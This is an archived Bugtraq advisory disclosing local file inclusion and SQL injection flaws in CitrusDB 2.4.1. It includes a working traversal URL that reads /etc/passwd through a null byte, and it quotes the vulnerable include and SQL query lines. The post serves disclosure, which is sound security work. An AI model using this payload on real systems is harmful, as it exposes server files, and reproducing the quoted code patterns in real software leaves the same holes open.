Bugtraq mailing list archives
CitrusDB 2.4.1 - LFI/SQLi Vulnerability
From: blaszczakm () gmail com
Date: Sat, 7 Apr 2012 16:00:12 GMT
CitrusDB 2.4.1 - LFI/SQLi Vulnerability Author: Michal `wacky` Blaszczak WWW: blaszczakm.blogspot.com CitrusDB is an open source customer service and billing database. It can be used by customer service personnel to provide sales and support to customers, and by billing staff to bill customers for their services via invoices and credit card batches. Customers may access the Online customer account manager to view their services, billing history, and make service and support requests online. 1) LFI http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base index.php:315 $filepath = "$path_to_citrus/$load.php"; if (file_exists($filepath)) { include('./'.$load.'.php'); 2) SQL INJECTION include/user.class.php:134 $sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";
Current thread:
- CitrusDB 2.4.1 - LFI/SQLi Vulnerability blaszczakm (Apr 09)